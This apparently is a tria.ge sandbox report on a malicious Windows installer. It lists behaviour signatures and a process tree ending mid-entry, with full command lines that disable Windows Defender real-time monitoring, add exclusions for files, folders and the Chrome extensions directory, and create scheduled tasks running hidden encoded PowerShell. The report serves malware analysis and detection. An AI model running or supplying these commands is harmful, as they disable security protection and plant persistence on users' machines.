Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    195s
  • max time network
    196s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    01/05/2024, 23:51

General

  • Target

    bd9223a89261ed0145e6a33c455d6fa6a00f7ddbb754646612682e6c624d14d3.exe

  • Size

    7.3MB

  • MD5

    49c1c3d1621a7af828cde4e712a64f26

  • SHA1

    ba16d384f3fbd954eaa8deab2808e2341fd7466e

  • SHA256

    bd9223a89261ed0145e6a33c455d6fa6a00f7ddbb754646612682e6c624d14d3

  • SHA512

    0a954fe59edfc36d62859f8ca9cd32d5043662f92aa2c4d136fee185ec3c3ce305d1f0c55dc1301eb1956fb6885dff973ba2b0074dad5ffaac9e95b712f4398f

  • SSDEEP

    196608:91OBiBwIPypbHKxKJAkezCFo3+vy80LtkJL5e+2Xo:3OBiB/P4b/e6K/jaDwo

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 12 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 27 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 39 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\bd9223a89261ed0145e6a33c455d6fa6a00f7ddbb754646612682e6c624d14d3.exe
    "C:\Users\Admin\AppData\Local\Temp\bd9223a89261ed0145e6a33c455d6fa6a00f7ddbb754646612682e6c624d14d3.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1884
    • C:\Users\Admin\AppData\Local\Temp\7zS1DDD.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2564
      • C:\Users\Admin\AppData\Local\Temp\7zS1FB1.tmp\Install.exe
        .\Install.exe /FddidfBPP "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:2628
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2708
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2436
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2736
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                7⤵
                  PID:2588
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2744
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:2508
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                  7⤵
                    PID:2800
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                5⤵
                  PID:2784
                  • C:\Windows\SysWOW64\cmd.exe
                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                    6⤵
                      PID:2968
                      • \??\c:\windows\SysWOW64\reg.exe
                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                        7⤵
                          PID:2156
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                      5⤵
                        PID:2584
                        • C:\Windows\SysWOW64\cmd.exe
                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                          6⤵
                            PID:2472
                            • \??\c:\windows\SysWOW64\reg.exe
                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                              7⤵
                                PID:2468
                          • C:\Windows\SysWOW64\forfiles.exe
                            forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                            5⤵
                              PID:2488
                              • C:\Windows\SysWOW64\cmd.exe
                                /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                6⤵
                                  PID:2504
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                    7⤵
                                    • Drops file in System32 directory
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2536
                                    • C:\Windows\SysWOW64\gpupdate.exe
                                      "C:\Windows\system32\gpupdate.exe" /force
                                      8⤵
                                        PID:1880
                              • C:\Windows\SysWOW64\forfiles.exe
                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                4⤵
                                  PID:1492
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                    5⤵
                                      PID:1460
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                        6⤵
                                        • Drops file in System32 directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1472
                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                          7⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2128
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /CREATE /TN "baOmDneVXoOuKLmJPZ" /SC once /ST 23:52:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\QJyOOZntLhEYOJVTw\HQTPPrichaMbyDn\kVOVvTh.exe\" 4w /VZydidGlTW 525403 /S" /V1 /F
                                    4⤵
                                    • Drops file in Windows directory
                                    • Creates scheduled task(s)
                                    PID:1452
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn baOmDneVXoOuKLmJPZ"
                                    4⤵
                                      PID:2532
                                      • C:\Windows\SysWOW64\cmd.exe
                                        /C schtasks /run /I /tn baOmDneVXoOuKLmJPZ
                                        5⤵
                                          PID:1364
                                          • \??\c:\windows\SysWOW64\schtasks.exe
                                            schtasks /run /I /tn baOmDneVXoOuKLmJPZ
                                            6⤵
                                              PID:1444
                                  • C:\Windows\system32\taskeng.exe
                                    taskeng.exe {D7CC79BF-403D-48F1-979A-54979512F035} S-1-5-18:NT AUTHORITY\System:Service:
                                    1⤵
                                      PID:2364
                                      • C:\Users\Admin\AppData\Local\Temp\QJyOOZntLhEYOJVTw\HQTPPrichaMbyDn\kVOVvTh.exe
                                        C:\Users\Admin\AppData\Local\Temp\QJyOOZntLhEYOJVTw\HQTPPrichaMbyDn\kVOVvTh.exe 4w /VZydidGlTW 525403 /S
                                        2⤵
                                        • Executes dropped EXE
                                        • Drops file in System32 directory
                                        • Modifies data under HKEY_USERS
                                        PID:856
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                          3⤵
                                            PID:1660
                                            • C:\Windows\SysWOW64\forfiles.exe
                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                              4⤵
                                                PID:1936
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                  5⤵
                                                    PID:1940
                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                      6⤵
                                                        PID:2248
                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                    4⤵
                                                      PID:1980
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                        5⤵
                                                          PID:2172
                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                            6⤵
                                                              PID:1680
                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                          4⤵
                                                            PID:1220
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                              5⤵
                                                                PID:2228
                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                  6⤵
                                                                    PID:2888
                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                4⤵
                                                                  PID:2880
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                    5⤵
                                                                      PID:2452
                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                        6⤵
                                                                          PID:2456
                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                      4⤵
                                                                        PID:2276
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                          5⤵
                                                                            PID:1664
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                              6⤵
                                                                              • Drops file in System32 directory
                                                                              • Modifies data under HKEY_USERS
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:352
                                                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                7⤵
                                                                                  PID:972
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /CREATE /TN "gTuxKqbKc" /SC once /ST 13:21:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                          3⤵
                                                                          • Creates scheduled task(s)
                                                                          PID:1708
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /run /I /tn "gTuxKqbKc"
                                                                          3⤵
                                                                            PID:1788
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks /DELETE /F /TN "gTuxKqbKc"
                                                                            3⤵
                                                                              PID:1976
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                              3⤵
                                                                                PID:2900
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                                  4⤵
                                                                                  • Modifies Windows Defender Real-time Protection settings
                                                                                  PID:2908
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                                3⤵
                                                                                  PID:1572
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                                    4⤵
                                                                                    • Modifies Windows Defender Real-time Protection settings
                                                                                    PID:2168
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  schtasks /CREATE /TN "gkCorfxfY" /SC once /ST 11:47:52 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                  3⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:2440
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  schtasks /run /I /tn "gkCorfxfY"
                                                                                  3⤵
                                                                                    PID:2012
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    schtasks /DELETE /F /TN "gkCorfxfY"
                                                                                    3⤵
                                                                                      PID:2944
                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                                                                      3⤵
                                                                                        PID:2972
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                          4⤵
                                                                                            PID:2536
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                              5⤵
                                                                                              • Drops file in System32 directory
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:2504
                                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                6⤵
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:888
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TtNtWPRQARDvDBvI" /t REG_DWORD /d 0 /reg:32
                                                                                          3⤵
                                                                                            PID:2928
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TtNtWPRQARDvDBvI" /t REG_DWORD /d 0 /reg:32
                                                                                              4⤵
                                                                                              • Windows security bypass
                                                                                              PID:1792
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TtNtWPRQARDvDBvI" /t REG_DWORD /d 0 /reg:64
                                                                                            3⤵
                                                                                              PID:1740
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TtNtWPRQARDvDBvI" /t REG_DWORD /d 0 /reg:64
                                                                                                4⤵
                                                                                                • Windows security bypass
                                                                                                PID:2772
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TtNtWPRQARDvDBvI" /t REG_DWORD /d 0 /reg:32
                                                                                              3⤵
                                                                                                PID:2128
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TtNtWPRQARDvDBvI" /t REG_DWORD /d 0 /reg:32
                                                                                                  4⤵
                                                                                                    PID:2384
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TtNtWPRQARDvDBvI" /t REG_DWORD /d 0 /reg:64
                                                                                                  3⤵
                                                                                                    PID:1752
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TtNtWPRQARDvDBvI" /t REG_DWORD /d 0 /reg:64
                                                                                                      4⤵
                                                                                                        PID:1756
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      cmd /C copy nul "C:\Windows\Temp\TtNtWPRQARDvDBvI\llSOOLGu\fdYZfjAUxeGwrLEN.wsf"
                                                                                                      3⤵
                                                                                                        PID:1460
                                                                                                      • C:\Windows\SysWOW64\wscript.exe
                                                                                                        wscript "C:\Windows\Temp\TtNtWPRQARDvDBvI\llSOOLGu\fdYZfjAUxeGwrLEN.wsf"
                                                                                                        3⤵
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        PID:2212
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PqbaBdNutUHU2" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1168
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PqbaBdNutUHU2" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1364
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lExdmLMBU" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1356
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lExdmLMBU" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:2248
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ruvdGviMRzUn" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1936
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ruvdGviMRzUn" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:2228
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tcAZjUgKvOkyC" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:2880
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tcAZjUgKvOkyC" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:868
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vTGqftCYFnqsQTavPzR" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1412
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vTGqftCYFnqsQTavPzR" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1660
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\ypvfxRdiVpdIIEVB" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1852
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\ypvfxRdiVpdIIEVB" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1404
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1684
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:2424
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\QJyOOZntLhEYOJVTw" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1788
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\QJyOOZntLhEYOJVTw" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1468
                                                                                                        • C:\Windows\SysWOW64\reg.exe
